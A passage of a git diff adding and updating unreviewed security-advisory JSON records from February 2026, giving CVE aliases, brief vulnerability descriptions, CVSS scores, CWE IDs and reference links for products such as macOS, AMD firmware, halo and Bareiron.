"CWE-20" + "CWE-20", + "CWE-617" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-77vc-xm5w-w2vq/GHSA-77vc-xm5w-w2vq.json b/advisories/unreviewed/2026/02/GHSA-77vc-xm5w-w2vq/GHSA-77vc-xm5w-w2vq.json new file mode 100644 index 0000000000000..1c3f01867d478 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-77vc-xm5w-w2vq/GHSA-77vc-xm5w-w2vq.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-77vc-xm5w-w2vq", + "modified": "2026-02-12T18:30:24Z", + "published": "2026-02-12T18:30:24Z", + "aliases": [ + "CVE-2025-69807" + ], + "details": "p2r3 Bareiron commit: 8e4d4020d is vulnerable to Buffer Overflow, which allows unauthenticated remote attackers to cause a denial of service via a packet sent to the server.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69807" + }, + { + "type": "WEB", + "url": "https://github.com/p2r3/bareiron" + }, + { + "type": "WEB", + "url": "https://github.com/vmpr0be/bareiron-vr/blob/main/CVE-2025-69807.md" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T18:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7p49-g593-x646/GHSA-7p49-g593-x646.json b/advisories/unreviewed/2026/02/GHSA-7p49-g593-x646/GHSA-7p49-g593-x646.json new file mode 100644 index 0000000000000..64a6b11defed7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7p49-g593-x646/GHSA-7p49-g593-x646.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7p49-g593-x646", + "modified": "2026-02-12T18:30:23Z", + "published": "2026-02-12T18:30:23Z", + "aliases": [ + "CVE-2025-70886" + ], + "details": "An issue in halo v.2.22.4 and before allows a remote attacker to cause a denial of service via a crafted payload to the public comment submission endpoint", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70886" + }, + { + "type": "WEB", + "url": "https://github.com/halo-dev/halo/issues/7890" + }, + { + "type": "WEB", + "url": "https://github.com/HowieHz/CVE-2025-70886" + }, + { + "type": "WEB", + "url": "https://howiehz.top/archives/halo-comment-payload-tweaker" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T16:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8258-fr2h-jgx8/GHSA-8258-fr2h-jgx8.json b/advisories/unreviewed/2026/02/GHSA-8258-fr2h-jgx8/GHSA-8258-fr2h-jgx8.json new file mode 100644 index 0000000000000..5a2ea86496aaa --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8258-fr2h-jgx8/GHSA-8258-fr2h-jgx8.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8258-fr2h-jgx8", + "modified": "2026-02-12T18:30:23Z", + "published": "2026-02-12T18:30:23Z", + "aliases": [ + "CVE-2025-61879" + ], + "details": "In Infoblox NIOS through 9.0.7, a High-Privileged User Can Trigger an Arbitrary File Write via the Account Creation Mechanism.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61879" + }, + { + "type": "WEB", + "url": "https://infoblox.com" + }, + { + "type": "WEB", + "url": "https://support.infoblox.com/s/article/CVE-2025-61879-and-CVE-2025-61880" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T17:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-84wm-58x3-8fvc/GHSA-84wm-58x3-8fvc.json b/advisories/unreviewed/2026/02/GHSA-84wm-58x3-8fvc/GHSA-84wm-58x3-8fvc.json index 8e62de53e626f..4cc241001175d 100644 --- a/advisories/unreviewed/2026/02/GHSA-84wm-58x3-8fvc/GHSA-84wm-58x3-8fvc.json +++ b/advisories/unreviewed/2026/02/GHSA-84wm-58x3-8fvc/GHSA-84wm-58x3-8fvc.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-84wm-58x3-8fvc", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-12T18:30:23Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20666" ], "details": "An authorization issue was addressed with improved state management. This issue is fixed in macOS Tahoe 26.3. An app may be able to access sensitive user data.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-285" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:09Z" diff --git a/advisories/unreviewed/2026/02/GHSA-8cmp-jqmx-pj7w/GHSA-8cmp-jqmx-pj7w.json b/advisories/unreviewed/2026/02/GHSA-8cmp-jqmx-pj7w/GHSA-8cmp-jqmx-pj7w.json index 99c6031967172..9d0bff70748c0 100644 --- a/advisories/unreviewed/2026/02/GHSA-8cmp-jqmx-pj7w/GHSA-8cmp-jqmx-pj7w.json +++ b/advisories/unreviewed/2026/02/GHSA-8cmp-jqmx-pj7w/GHSA-8cmp-jqmx-pj7w.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-8cmp-jqmx-pj7w", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-12T18:30:22Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20605" ], "details": "The issue was addressed with improved memory handling. This issue is fixed in macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, macOS Tahoe 26.3, macOS Sonoma 14.8.4. An app may be able to crash a system process.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -32,8 +37,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:04Z" diff --git a/advisories/unreviewed/2026/02/GHSA-926h-3qgq-9w39/GHSA-926h-3qgq-9w39.json b/advisories/unreviewed/2026/02/GHSA-926h-3qgq-9w39/GHSA-926h-3qgq-9w39.json index 540615e7debfc..a3a1cf27b5500 100644 --- a/advisories/unreviewed/2026/02/GHSA-926h-3qgq-9w39/GHSA-926h-3qgq-9w39.json +++ b/advisories/unreviewed/2026/02/GHSA-926h-3qgq-9w39/GHSA-926h-3qgq-9w39.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-926h-3qgq-9w39", - "modified": "2026-02-12T00:31:03Z", + "modified": "2026-02-12T18:30:21Z", "published": "2026-02-12T00:31:03Z", "aliases": [ "CVE-2025-46290" ], "details": "A logic issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.7.4, macOS Sonoma 14.8.4. A remote attacker may be able to cause a denial-of-service.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-693" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:02Z" diff --git a/advisories/unreviewed/2026/02/GHSA-96rf-whf9-r5vh/GHSA-96rf-whf9-r5vh.json b/advisories/unreviewed/2026/02/GHSA-96rf-whf9-r5vh/GHSA-96rf-whf9-r5vh.json index 8ca1f4404f2fc..16ec8bf10068e 100644 --- a/advisories/unreviewed/2026/02/GHSA-96rf-whf9-r5vh/GHSA-96rf-whf9-r5vh.json +++ b/advisories/unreviewed/2026/02/GHSA-96rf-whf9-r5vh/GHSA-96rf-whf9-r5vh.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-96rf-whf9-r5vh", - "modified": "2026-02-12T00:31:03Z", + "modified": "2026-02-12T18:30:21Z", "published": "2026-02-12T00:31:03Z", "aliases": [ "CVE-2024-50619" ], "details": "Vulnerabilities in the My Account and User Management components in CIPPlanner CIPAce before 9.17 allows attackers to escalate their access levels. A low-privileged authenticated user can gain access to other people's accounts by tampering with the client's user id to change their account information. A low-privileged authenticated user can elevate his or her system privileges by modifying the information of a user role that is disabled in the client.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T22:15:50Z" diff --git a/advisories/unreviewed/2026/02/GHSA-99pv-pwgp-5cm5/GHSA-99pv-pwgp-5cm5.json b/advisories/unreviewed/2026/02/GHSA-99pv-pwgp-5cm5/GHSA-99pv-pwgp-5cm5.json index 52700cc3d4f3c..7f0e7a0321f32 100644 --- a/advisories/unreviewed/2026/02/GHSA-99pv-pwgp-5cm5/GHSA-99pv-pwgp-5cm5.json +++ b/advisories/unreviewed/2026/02/GHSA-99pv-pwgp-5cm5/GHSA-99pv-pwgp-5cm5.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-99pv-pwgp-5cm5", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-12T18:30:21Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2025-46303" ], "details": "The issue was addressed with improved bounds checks. This issue is fixed in macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, macOS Sonoma 14.8.4. A malicious HID device may cause an unexpected process crash.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:02Z" diff --git a/advisories/unreviewed/2026/02/GHSA-9v69-wg3m-pj38/GHSA-9v69-wg3m-pj38.json b/advisories/unreviewed/2026/02/GHSA-9v69-wg3m-pj38/GHSA-9v69-wg3m-pj38.json index 38d2dc3f8f2a8..f5bca9a1ff8cd 100644 --- a/advisories/unreviewed/2026/02/GHSA-9v69-wg3m-pj38/GHSA-9v69-wg3m-pj38.json +++ b/advisories/unreviewed/2026/02/GHSA-9v69-wg3m-pj38/GHSA-9v69-wg3m-pj38.json @@ -50,7 +50,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-77" + "CWE-77", + "CWE-78" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-9w8m-7cg3-7mh9/GHSA-9w8m-7cg3-7mh9.json b/advisories/unreviewed/2026/02/GHSA-9w8m-7cg3-7mh9/GHSA-9w8m-7cg3-7mh9.json new file mode 100644 index 0000000000000..500f550e17e98 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9w8m-7cg3-7mh9/GHSA-9w8m-7cg3-7mh9.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9w8m-7cg3-7mh9", + "modified": "2026-02-12T18:30:24Z", + "published": "2026-02-12T18:30:24Z", + "aliases": [ + "CVE-2023-31323" + ], + "details": "Type confusion in the AMD Secure Processor (ASP) could allow an attacker to pass a malformed argument to the External Global Memory Interconnect Trusted Agent (XGMI TA) leading to a memory safety violation potentially resulting in loss of confidentiality, integrity, or availability.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31323" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6024.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-843" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T18:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-c37x-p7mp-hh29/GHSA-c37x-p7mp-hh29.json b/advisories/unreviewed/2026/02/GHSA-c37x-p7mp-hh29/GHSA-c37x-p7mp-hh29.json index bfbb5e822b6d5..6ee2c3423474a 100644 --- a/advisories/unreviewed/2026/02/GHSA-c37x-p7mp-hh29/GHSA-c37x-p7mp-hh29.json +++ b/advisories/unreviewed/2026/02/GHSA-c37x-p7mp-hh29/GHSA-c37x-p7mp-hh29.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-c37x-p7mp-hh29", - "modified": "2026-02-11T21:30:40Z", + "modified": "2026-02-12T18:30:21Z", "published": "2026-02-11T21:30:39Z", "aliases": [ "CVE-2026-2316" ], "details": "Insufficient policy enforcement in Frames in Google Chrome prior to 145.0.7632.45 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-451" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T19:15:51Z" diff --git a/advisories/unreviewed/2026/02/GHSA-c5gm-v7v7-vjx9/GHSA-c5gm-v7v7-vjx9.json b/advisories/unreviewed/2026/02/GHSA-c5gm-v7v7-vjx9/GHSA-c5gm-v7v7-vjx9.json index a1ec15ef90a82..71b182c662e59 100644 --- a/advisories/unreviewed/2026/02/GHSA-c5gm-v7v7-vjx9/GHSA-c5gm-v7v7-vjx9.json +++ b/advisories/unreviewed/2026/02/GHSA-c5gm-v7v7-vjx9/GHSA-c5gm-v7v7-vjx9.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-c5gm-v7v7-vjx9", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-12T18:30:22Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20660" ], "details": "A path handling issue was addressed with improved logic. This issue is fixed in macOS Tahoe 26.3, macOS Sonoma 14.8.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3, Safari 26.3. A remote user may be able to write arbitrary files.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -41,7 +46,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:08Z" diff --git a/advisories/unreviewed/2026/02/GHSA-c6jr-3394-hq95/GHSA-c6jr-3394-hq95.json b/advisories/unreviewed/2026/02/GHSA-c6jr-3394-hq95/GHSA-c6jr-3394-hq95.json new file mode 100644 index 0000000000000..047ea8ef6317c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c6jr-3394-hq95/GHSA-c6jr-3394-hq95.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c6jr-3394-hq95", + "modified": "2026-02-12T18:30:24Z", + "published": "2026-02-12T18:30:24Z", + "aliases": [ + "CVE-2025-63421" + ], + "details": "An issue in filosoft Comerc.32 Commercial Invoicing v.16.0.0.3 allows a local attacker to execute arbitrary code via the comeinst.exe file", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-63421" + }, + { + "type": "WEB", + "url": "https://ghostline.neocities.org/CVE-2025-63421" + }, + { + "type": "WEB", + "url": "https://www.filosoft.pt" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T18:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-ccq3-qfjv-47q4/GHSA-ccq3-qfjv-47q4.json b/advisories/unreviewed/2026/02/GHSA-ccq3-qfjv-47q4/GHSA-ccq3-qfjv-47q4.json new file mode 100644 index 0000000000000..e65144d9a85d5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-ccq3-qfjv-47q4/GHSA-ccq3-qfjv-47q4.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ccq3-qfjv-47q4", + "modified": "2026-02-12T18:30:24Z", + "published": "2026-02-12T18:30:24Z", + "aliases": [ + "CVE-2025-54519" + ], + "details": "A DLL hijacking vulnerability in Doc Nav could allow a local attacker to achieve privilege escalation, potentially resulting in arbitrary code execution.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54519" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-8013.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-427" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T18:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cp3m-5wf6-4649/GHSA-cp3m-5wf6-4649.json b/advisories/unreviewed/2026/02/GHSA-cp3m-5wf6-4649/GHSA-cp3m-5wf6-4649.json index c63af0afe7e2a..359290b452772 100644 --- a/advisories/unreviewed/2026/02/GHSA-cp3m-5wf6-4649/GHSA-cp3m-5wf6-4649.json +++ b/advisories/unreviewed/2026/02/GHSA-cp3m-5wf6-4649/GHSA-cp3m-5wf6-4649.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cp3m-5wf6-4649", - "modified": "2026-02-11T15:30:27Z", + "modified": "2026-02-12T18:30:21Z", "published": "2026-02-11T15:30:27Z", "aliases": [ "CVE-2026-2248" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2248" }, + { + "type": "WEB", + "url": "https://cydome.io/vulnerability-advisory-cve-2026-2248-unauthenticated-remote-root-shell-in-metis-wic" + }, { "type": "WEB", "url": "https://www.metis.tech" diff --git a/advisories/unreviewed/2026/02/GHSA-f24m-jwf4-xpxc/GHSA-f24m-jwf4-xpxc.json b/advisories/unreviewed/2026/02/GHSA-f24m-jwf4-xpxc/GHSA-f24m-jwf4-xpxc.json index c1cb0a29e8628..0363c862d36ca 100644 --- a/advisories/unreviewed/2026/02/GHSA-f24m-jwf4-xpxc/GHSA-f24m-jwf4-xpxc.json +++ b/advisories/unreviewed/2026/02/GHSA-f24m-jwf4-xpxc/GHSA-f24m-jwf4-xpxc.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-f24m-jwf4-xpxc", - "modified": "2026-02-12T00:31:03Z", + "modified": "2026-02-12T18:30:21Z", "published": "2026-02-12T00:31:03Z", "aliases": [ "CVE-2025-43403" ], "details": "An authorization issue was addressed with improved state management. This issue is fixed in macOS Sequoia 15.7.4, macOS Sonoma 14.8.4. An app may be able to access sensitive user data.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-285" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:01Z" diff --git a/advisories/unreviewed/2026/02/GHSA-f6c8-c5qf-mj37/GHSA-f6c8-c5qf-mj37.json b/advisories/unreviewed/2026/02/GHSA-f6c8-c5qf-mj37/GHSA-f6c8-c5qf-mj37.json index bc182fcd39cb6..8a83e8403423d 100644 --- a/advisories/unreviewed/2026/02/GHSA-f6c8-c5qf-mj37/GHSA-f6c8-c5qf-mj37.json +++ b/advisories/unreviewed/2026/02/GHSA-f6c8-c5qf-mj37/GHSA-f6c8-c5qf-mj37.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-f7qx-wh9j-7278/GHSA-f7qx-wh9j-7278.json b/advisories/unreviewed/2026/02/GHSA-f7qx-wh9j-7278/GHSA-f7qx-wh9j-7278.json index c864305b67c01..2b74ce8142ddb 100644 --- a/advisories/unreviewed/2026/02/GHSA-f7qx-wh9j-7278/GHSA-f7qx-wh9j-7278.json +++ b/advisories/unreviewed/2026/02/GHSA-f7qx-wh9j-7278/GHSA-f7qx-wh9j-7278.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-f7qx-wh9j-7278", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-12T18:30:21Z", "published": "2026-02-12T00:31:03Z", "aliases": [ "CVE-2025-46301" ], "details": "The issue was addressed with improved bounds checks. This issue is fixed in macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, macOS Sonoma 14.8.4. A malicious HID device may cause an unexpected process crash.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:02Z" diff --git a/advisories/unreviewed/2026/02/GHSA-fcfm-mfmf-7xm3/GHSA-fcfm-mfmf-7xm3.json b/advisories/unreviewed/2026/02/GHSA-fcfm-mfmf-7xm3/GHSA-fcfm-mfmf-7xm3.json new file mode 100644 index 0000000000000..6638df2458e48 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fcfm-mfmf-7xm3/GHSA-fcfm-mfmf-7xm3.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fcfm-mfmf-7xm3", + "modified": "2026-02-12T18:30:24Z", + "published": "2026-02-12T18:30:24Z", + "aliases": [ + "CVE-2023-20601" + ], + "details": "Improper input validation within RAS TA Driver can allow a local attacker to access out-of-bounds memory, potentially resulting in a denial-of-service condition.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-20601" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6024.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-129" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T18:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fmxw-gfwm-67w3/GHSA-fmxw-gfwm-67w3.json b/advisories/unreviewed/2026/02/GHSA-fmxw-gfwm-67w3/GHSA-fmxw-gfwm-67w3.json index c26a216b39835..8c4861fce2439 100644 --- a/advisories/unreviewed/2026/02/GHSA-fmxw-gfwm-67w3/GHSA-fmxw-gfwm-67w3.json +++ b/advisories/unreviewed/2026/02/GHSA-fmxw-gfwm-67w3/GHSA-fmxw-gfwm-67w3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fmxw-gfwm-67w3", - "modified": "2026-02-11T15:30:27Z", + "modified": "2026-02-12T18:30:21Z", "published": "2026-02-11T15:30:27Z", "aliases": [ "CVE-2026-2250" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2250" }, + { + "type": "WEB", + "url": "https://cydome.io/vulnerability-advisory-cve-2026-2250-unauthenticated-data-exfilteration-and-information-disclosure-in-metis-wic-wireless-intelligent-collector" + }, { "type": "WEB", "url": "https://www.metis.tech" diff --git a/advisories/unreviewed/2026/02/GHSA-fqf2-x743-9564/GHSA-fqf2-x743-9564.json b/advisories/unreviewed/2026/02/GHSA-fqf2-x743-9564/GHSA-fqf2-x743-9564.json index 9d506fd02037f..37b01af86dc3f 100644 --- a/advisories/unreviewed/2026/02/GHSA-fqf2-x743-9564/GHSA-fqf2-x743-9564.json +++ b/advisories/unreviewed/2026/02/GHSA-fqf2-x743-9564/GHSA-fqf2-x743-9564.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-fqf2-x743-9564", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-12T18:30:23Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20662" ], "details": "An authorization issue was addressed with improved state management. This issue is fixed in macOS Sequoia 15.7.4, macOS Tahoe 26.3. An attacker with physical access to a locked device may be able to view sensitive user information.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -25,7 +30,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:08Z" diff --git a/advisories/unreviewed/2026/02/GHSA-fr6m-j2m3-hgw4/GHSA-fr6m-j2m3-hgw4.json b/advisories/unreviewed/2026/02/GHSA-fr6m-j2m3-hgw4/GHSA-fr6m-j2m3-hgw4.json new file mode 100644 index 0000000000000..39eb025aad66f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fr6m-j2m3-hgw4/GHSA-fr6m-j2m3-hgw4.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fr6m-j2m3-hgw4", + "modified": "2026-02-12T18:30:24Z", + "published": "2026-02-12T18:30:24Z", + "aliases": [ + "CVE-2024-36319" + ], + "details": "Debug code left active in AMD's Video Decoder Engine Firmware (VCN FW) could allow a attacker to submit a maliciously crafted command causing the VCN FW to perform read/writes HW registers, potentially impacting confidentiality, integrity and availabilability of the system.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-36319" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6024.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1191" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T18:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-frmq-2cmp-gh32/GHSA-frmq-2cmp-gh32.json b/advisories/unreviewed/2026/02/GHSA-frmq-2cmp-gh32/GHSA-frmq-2cmp-gh32.json index 10c03b5141585..8d81b4d18ac4e 100644 --- a/advisories/unreviewed/2026/02/GHSA-frmq-2cmp-gh32/GHSA-frmq-2cmp-gh32.json +++ b/advisories/unreviewed/2026/02/GHSA-frmq-2cmp-gh32/GHSA-frmq-2cmp-gh32.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-frmq-2cmp-gh32", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-12T18:30:22Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20606" ], "details": "This issue was addressed by removing the vulnerable code. This issue is fixed in macOS Tahoe 26.3, macOS Sonoma 